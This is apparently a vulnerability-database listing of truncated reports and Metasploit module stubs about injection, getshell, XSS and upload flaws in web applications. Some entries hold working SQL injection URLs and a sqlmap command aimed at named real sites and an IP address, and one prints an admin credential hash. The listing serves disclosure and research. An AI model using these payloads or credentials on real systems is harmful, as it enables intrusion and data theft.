Srun3000计费系统漏洞集合

简要描述： 问题很严重，综合各个漏洞，可以随意getshell，漏洞大致有默认配置不当、命令执行、越权操作、未授权访问、SQL注入、任意文件删除、任意文件下载、任意允许类型文件上传 详细说明： 注：部分漏洞内容重复 说明： 查看之前厂商的回复得知，最新版应该为Srun3000 3.00rc14.17.15，而且新版本代码全部加密（其实代码加密不能从根本上解决安全问题，有时会变得更不安全），同时提供框架校验，命令执行不采用shell模式等等，修复了很多问题。 由于暂时未能看到最新版，所以测试的版本为Srun3000...

Gitlist Unauthenticated Remote Command Execution

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def...

MacCMS v8 /inc/api.php SQL注入漏洞

No description provided by source...

ecshop_dz论坛注入可以绕过WAF

简要描述： 注入不是亮点，亮点在于绕过waf，专业绕waf，30年。 详细说明： 利用DZ本漏洞的特性，拆开sql语句。 http://bbs.ecshop.com/faq.php?action=grouppermission&gids99=%27&gids1000= and 1=updatexml1,concat0x5e24,/ &gids1010=/select user/ &gids1020=/,0x5e24,1%23 漏洞证明：...

HDwiki论坛sql注射漏洞

简要描述： 0.0 详细说明： dz7.2注射。 漏洞证明： url:http://kaiyuan.hudong.com/bbs/ user:admin pass:9d05eabd2d70473f4fa686fcd6ea2071 mail:[email protected]...

Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include...

PHPB2B 5.0 /install/install.php 信息泄漏漏洞

No description provided by source...

Oracle Event Processing FileUploadServlet Arbitrary File Upload

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include...

srun3000计费系统 注入漏洞

简要描述： RT 详细说明： 挖得人还是挺多的啊。 SQL：SELECT count FROM user WHERE userloginname='1'' AND userrealname='Smith' error：You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Smith'' at line 1...

Netgear WNR1000v3 - Password Recovery Credential Disclosure Vulnerability

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Exploit Title: Netgear WNR1000v3 Password Recovery Credential Disclosure Vulnerability Date: 7-5-14 Exploit Author: c1ph04 Vendor...

用友CRM注入漏洞（无需登录通杀所有版本）

简要描述： 用友CRM注入漏洞，无需登录，通杀所有版本 详细说明： 漏洞url： http://220.178.27.116:8001/webservice/service.php?class=WSSystem&orgcode=1 使用sqlmap进行注入。 sqlmap.py -u "http://220.178.27.116:8001/webservice/service.php?class=WSSystem&orgcode=1" --current-user --current-db --is-dba sqlmap identified the following injectio...

Microsoft IIS4/5 CGI 命令执行漏洞

No description provided by source...

Destoon v5 /include/tag.func.php 代码执行漏洞

No description provided by source...

CmsEasy多出任意文件删除到Getshell

简要描述： CmsEasy多出任意文件删除，可直接删除waf，Getshell so Easy ！ 详细说明： CmsEasy在后台权限验证存在缺陷，导致登陆绕过，以及越权操作后台。 1、在后台登陆验证时存在缺陷，导致随意登陆绕过 2、在进行后台功能操作时，验证不全，存在缺陷，导致越权操作 3、通过上面的问题任意用户，包括非登录用户即可操作后台，危害较大！ 来看看登陆这里的验证： lib/admin/admin.php文件 ADMINDIR; front::flash'后台目录更改成功！'; front::$rewrite=false; parent::construct; $servi...

qibocms 新闻系统 Getshell (需结合解析漏洞)#2

简要描述： 上次发的那个官方已补,再来继续看看还可以不。 IIS6 or LINUX+APACHE 详细说明： 上回分解 请看这 WooYun: qibocms 新闻系统 Getshell 需结合解析漏洞 http://bbs.qibosoft.com/down2.php?v=news1.0down 下载地址 刚下的。 来看看官方是怎么修复的 在news/inc/articfunction.php中 function getoutpic$str,$fid=0,$getpic=1 global $webdb,$lfjuid,$pre; if!$getpic return $str;...

Ubisoft Uplay 4.6 - Insecure File Permissions Local Privilege Escalation

No description provided by source. Ubisoft Uplay 4.6 Insecure File Permissions Local Privilege Escalation Vendor: Ubisoft Entertainment S.A. Product web page: http://www.ubi.com Affected version: 4.6.3208 PC 4.5.2.3010 PC Summary: Uplay is a digital distribution, digital rights management,...

Ecmall V2.3.0-UTF8 正式版SQL注入漏洞(绕过过滤)

简要描述： 打了最新的补丁 详细说明： 漏洞http://wooyun.org/bugs/wooyun-2010-065284 绕过方法： updatexml函数 extractvalue函数 漏洞证明： url: http://localhost/ecmall/index.php?app=myshipping&act=edit&shippingid=1 payload1: shippingname=li&shippingdesc=asd&irstprice=10&stepprice=0&enabled=1&sortorder=255&codregions1' or...

F5 BIG-IP SQL注入漏洞

No description provided by source. SEC Consult Vulnerability Lab Security Advisory 20130122-1 ======================================================================= title: SQL Injection product: F5 BIG-IP vulnerable version: =11.2.0 fixed version: 11.2.0 HF3 11.2.1 HF3 CVE number: CVE-2012-3000...

FengCMS新版本重装

简要描述： FengCms Beta 1.20 管理这样判断冒是那里不对啊。 详细说明： 用switch做判断，真的搞不懂程序猿是怎么想的啊，这里的step变量可以控制，导致重装程序。 switch$GET'step' case '1': //安装许可协议 include ABSPATH."/step/step1.php"; break; case '2': //检查安装环境是否满足要求 $PHPGD = ''; ifextensionloaded'gd' iffunctionexists'imagepng' $PHPGD .= 'png';...

Srun3000计费系统任意文件删除漏洞

简要描述： Srun3000计费系统任意文件删除漏洞无需登录 详细说明： /srun3/srun/services/modules/login/controller/logincontroller.php 代码 / 删除一个文件 / // 此处存在任意文件删除漏洞--fuck public function deletefile global $file; echo $this-model-deletefile$file?101:100; deletefile文件路径为 /srun3/srun/services/modules/modules.php / 删除服务器上一个文件 @para...

Destoon前台getshell(CSRF任意代码执行)

简要描述： 测试版本 DESTOON B2B Version 5.0 Release 20140625 UTF-8 ZH-CN 详细说明： 0.问题文件 admin/tag.inc.php 95行 eval$tagcode; 未对用户提交的执行代码tagcode做安全限制 1.前台注册会员 2.进入会员中心，发布一条求购信息 信息标题：随意 行业分类：随意 产品图片：通过审查元素，修改 postthumb 的value为...

cmseasy 最新版SQL注入一枚(直接出数据无视360webscan)

简要描述： 真的不是针对，厂家不要介意，赶紧确认我另外两个吧，感谢！ 无视360webscan。 版本：20140605 详细说明： 漏洞与 WooYun: CmsEasy最新 V5.5-UTF8 正式版多处漏洞打包 重复。 注入函数在/bbs/add-archive.php， ifisset$POST'submit' ifstrtolowertrim$POST'verify' != strtolower$SESSION'verify' //actionpublic::turnPage'index.php','验证码输入错误！'; $archive =...

Destoon最新 V5.0-UTF8 正式版命令执行漏洞（后台）

简要描述： RT 详细说明： 后台一处命令执行漏洞，可添加系统账户。 漏洞位于admin/tag.inc.php case 'preview': $db-halt = 0; $destoontask = ''; if$tagcss $tagcss = stripslashes$tagcss; if$taghtmls $taghtmls = stripslashes$taghtmls; if$taghtmle $taghtmle = stripslashes$taghtmle; if$tagcode $tagcode = stripslashes$tagcode; if$tagjs...

finecms 最新版v2.3.3前台getshell

简要描述： 不指望厂商确认，我就是要打脸。官方认为自己已经修复的很干净了，在我看来还是一点用处都没有。wooyun官方能不能给我都补个rank，毕竟找了好几个getshell了。 'DRNAME' = '海豚大众版', 'DRUPDATE' = '2014.6.21', 'DRVERSION' = '2.3.3', 'DRVERSIONID' = 20 详细说明： 还是头像上传的地方，官方认为自己已经修复的很干净了，在我看来还是一点用处都没有。 不过demo站直接把头像上传的功能给阉割了，正常头像都没法上传了，所以我就不在demo上测试了，下载最新的v2.3.3，本地测试。 版本号：...

CmsEasy最新版多处SQL注入附如何从一处到多处漏洞快速挖掘定位

简要描述： CmsEasy5.x——CmsEasy5.5UTF-820140605.rar 通过一晚上分析，找到一处SQL注入 然后用了一早上分析这个注入点，找到多处 为了不刷RANK，免得一个一个提交麻烦，就全部提交了 附上如何通过一个问题点，快速的找到多个同样问题的漏洞点并利用 估计这是大牛在用，或者已经不用的方法，这里只是抛砖引玉，多多交流 详细说明： 首先来看看unionact.php： function registeraction $r = $this-union-getrowarray'userid'=$this-view-data'userid'; if$r echo...

CmsEasy最新 V5.5-UTF8 正式版多处漏洞打包

简要描述： 补了20140605 详细说明： 首先是个注入，这个漏洞比较无语，真正的无视过滤，没引号保护。。 漏洞位于bbs/add-archive.php： checklogin; $category = dbbbscategory::getInstance; $categorydata = $category-getAll; $cid = isset$GET'cid' ? intval$GET'cid' : 1 ; $label = dbbbslabel::getInstance; $labledata = $label-getAll; ifisset$POST'submit'...

DouPHP SQL注入一枚

简要描述： 注入 详细说明： 依然是getip的问题， guestbook.php:102行 if $rec == 'insert' / 跨站请求伪造CSRF的防御 / if $firewall-checktoken$POST'token' / html安全过滤器 / $POST = $firewall-doufilter$POST; $ip = $dou-getip; $addtime = time; $vcode = $check-iscaptcha$POST'vcode' ? strtoupper$POST'vcode' : ''; / 检查IP是否频繁留言 /...

cmseasy 反射型XSS无视浏览器filter无视360webscan

简要描述： RT，cmseasy后台是可以csrf getshell的。但我这里，就算以后cmseasy后台加token、验证referer，我也不怕了，反正是XSS，可以窃取token的，referer也是本站。 详细说明： 这个反射型XSS出在/bbs/index.php中，第4行： window.location.href='". strreplace'/bbs', '', $SERVER'REQUESTURI'."';"; requireonce 'bbspublic.php'; $category = dbbbscategory::getInstance;...

KesionCMS Persistent XSS

简要描述： KesionCMS Persistent XSS 详细说明： KesionCMS--论坛--发帖--帖子标题处存在Persistent XSS 漏洞证明：...

华天动力oa系统一处xss漏洞可盲打管理员

简要描述： xss 详细说明： http://demo.oa8000.com 官网给的演示站点测试 帐号user密码123456 在新建任务插入xss代码-选择让整站人看到 管理员 帐号admin 密码123456 登录 漏洞证明： 我TM没什么证明了，上传个图片传了几分钟.....给跪了...

DouPHP存储型XSS一枚可打后台管理

简要描述： xss 详细说明： 漏洞文件：admin/login.php:68行 $query = $dou-select$dou-tableadmin, '', "username = '$POSTusername'"; $user = $dou-fetcharray$query; if !isarray$user $dou-createadminlog$LANG'loginaction' . ": " . $POST'username' . " " . $LANG'loginusernamewrong' . " "; $dou-doumsg$LANG'logininputwrong'...

cmseasy 最新版任意权限getshell

简要描述： 这是一个很长的故事，还请客官慢慢看来。（看在我这么晚还在挖洞写文章的份上，求闪电呀！） 版本：2014-06-05 详细说明： 0x01 首先，从一个后台未授权访问开始讲起。 看到文件/lib/admin/admin.php if !defined'ROOT' exit'Can't Access !'; abstract class admin extends act function construct if ADMINDIR!=config::get'admindir' config::modifyarray'admindir'=ADMINDIR;...

Kerio Control 8.3.1 - SQL盲注漏洞

No description provided by source...

phpokcms 4.x CSRF漏洞

简要描述： 可蠕虫，可添加系统管理员。 详细说明： phpokcms存在csrf漏洞，管理员查看会员列表时不知不觉会自动添加新的系统管理员。 位置在会员头像处的img标签，由于新闻评论可显示头像，也可蠕虫发评论。 下面仅证明添加管理员的部分。 具体代码分析了，直接poc。 漏洞证明： 注册会员后打开如下链接。（域名路径请视情况修改）...

WDC前台getshell一枚

简要描述： 广告位：codescan.cn 呵呵 详细说明： mysql/adduser.php 这个文件没有验证权限（其实是验证的，不知道为什么被注释了） 那么我们可以利用这个添加一个mysql的账户 但是不能外连，只能localhost，貌似没什么用 database可以抓包篡改的 观众：这又个jB用 别急，朋友 wdcp下面有一个phpmyadmin 直接访问，http://xxx：8080/phpmyadmin 提示输入mysql账号密码 上面我们正好能加一个MySQL、用户...

Hdwiki设计缺陷知邮箱可改密码（包括管理员）

简要描述： 上Hdwiki官网 发现更新日期一直都没变。 还以为一直都没更新了, 结果今天下载一个下来看看。 发现之前发的洞竟然都补掉了。 看了看之前这个改密码那个 对比了一下。 发现增强了点验证。 加入了一个算法。 不过。。。。。。 —————————————————————————————————— ps. 更新程序了应该还是把日期更新了一下 要不别人会一直以为没更新的。 详细说明： WooYun: Hdwiki 设计缺陷 知邮箱可改密码（包括管理员） 上次的 现在来看看现在的。 依旧是control/user.php else $timetemp=date"Y-m-d...

kppw威客系统两处储存型xss漏洞

简要描述： xss 详细说明： 发布商品处存在两处储存型xss漏洞无任何过滤 首先是在内容处选择源代码模式 之后我们提交之后再标题处插入xss语句 之后发布，看看情况 我们再去看看发布后的源码 标题处 内容处 img src="https://images.seebug.org/upload/201407/03170...

Zurmo CRM - 储存型XSS

No description provided by source. Affected software: Zurmo CRM Zurmo is an Open Source Customer Relationship Management CRM application that is mobile, social, and gamified. We use a test-driven methodology for building every part of the application. Type of vulnerability: XSS Stored URL:...

PageAdmin VIEWSTATE引发的血案

简要描述： 本想找个注入的，却发现Isstr 与其绕过不如（此处打码）直接来的痛快。 @wefgod 小弟弱弱的告诉你 ViewState不仅仅可以WooYun-2014-61699这样用，还可以这样滴哟 详细说明： 下载pageAdmin 反编译发现混淆过 蛋疼！ 只好翻翻页面！各种页面各种翻 咿！尼玛 这是啥 ViewState"constr" 那就抄刀上阵吧 打开 ：http://192.168.10.64:9992/e/member/index.aspx?s=1&type=memfavolst 复制然后 这是在本地搭建的 那试试官网 附上官网的...

XDCMS企业管理系统SQL #3

简要描述： rt 详细说明： public function editsave $this-memberinfo; $userid=intvalCookie::getcookie'memberuserid'; $fields=$POST'fields'; //�޸����� $fieldsql=''; foreach$fields as $k=$v $fvalue=$v; ifisarray$v $fvalue=implode',',$v; $fieldsql.=",$k='".safehtml$fvalue."'"; $fieldsql=substr$fieldsql,1;...

YidaCms_X3.2逻辑错误造成越权访问,可修改管理密码

简要描述： 因代码逻辑错误,可以构造语句绕过,直接修改管理员密码 详细说明： 最新版的3.2下的 admin\CheckAdmin.asp username = request.Cookies"username" password = request.Cookies"password" cookiesmd5 = request.Cookies"cookiesmd5" dim adminname,adminpass,adminqx,adminaqx set rs = server.createobject"adodb.recordset" sql="select from...

WebTerra 1.1 /books.cgi 命令执行漏洞

No description provided by source...

华天动力oa系统多处xss漏洞打包--专业盲打管理员#2

简要描述： xss 详细说明： 在文档中心，随便点个进去，新建文件夹，名字插入xss代码 以上圈住的都可以新建文件夹，所以说是多处 漏洞证明：...

百度浏览器海外版（Spark Browser） v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)

Vendor: Baidu, Inc. Product web page: http://www.baidu.com Affected version: 26.5.9999.3511 Summary: Spark Browser is a free Internet browser with very sharp UIs and cool utilities. It's based on the Chromium technology platform, giving it fast browsing capabilities. Desc: Spark Browser version...

建站之星Sitestar官方注入漏洞

简要描述： 注入 详细说明： http://bbs.sitestar.cn/faq.php?action=grouppermission&gids99='&gids1000=%20and%20select%201%20from%20select%20count,concatversion,floorrand02x%20from%20informationschema.tables%20group%20by%20xa%23 漏洞证明： Discuz! info: MySQL Query Error Time: 2014-7-2 4:59pm Script: /faq.php SQL:...

释锐教育校校用平台通用SQL注入漏洞

简要描述： 释锐是全国领先的智慧教育解决方案供应商。致力于通过技术创新为中小学、职校、高校和教育行政管理机构提供有竞争力的智慧教育解决方案和服务，持续提升客户体验，为客户创造最大价值。目前，释锐的产品和解决方案已经应用于 25 个省市，服务全国 3000 多所学校。 此漏洞已验证，具有通用性。 详细说明： 以这个站为例： POST /us/user/sso.jsp HTTP/1.1 Content-Length: 163 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest...

CuuMall商城后台Getshell

简要描述： CuuMall商城后台Getshell 最新版本v2.3 其他版本未测试 估计也通杀 ok思密达！！！ 详细说明： CuuMall商城后台Getshell 有2种方法 第一种对表单里面的value参数没有过滤就直接显示了 还有种方法是可以利用解析漏洞 备份获取shell 下面是： -------------淫荡De分割线------------- 漏洞证明： 1 漏洞文件存在 \Runtime\app.php 'dbtype' = 'mysql', 'dbhost' = 'localhost', 'dbname' = 'cuumall', 'dbuser' = 'root',...

Discuz 7.2 /faq.php SQL注入漏洞

elseif$action == 'grouppermission' ... ... ksort$gids; $groupids = array; foreach$gids as $row $groupids = $row0; $query = $db-query"SELECT FROM $tablepreusergroups u LEFT JOIN $tablepreadmingroups a ON u.groupid=a.admingid WHERE u.groupid IN ".implodeids$groupids."";...

Discuz 7.2 /faq.php SQL注入漏洞 + UC_Key getshell exp

No description provided by source...

FengCms 过滤不言导致sql注入，可爆管理用户名密码

简要描述： 这个小的cms刚问世，我就测了下。感觉还是不错。但是百密终有一疏。注入啊…… 详细说明： /app/model/moduleModel.php 文件中 search函数是前台做搜索用的。具体看代码 public function search$arrays,$field="",$num="20" // vardump$arrays; //vardump$field; //die; if$arrays'project' $sql='select from '.DBPREFIX.$arrays'project'.' where title like...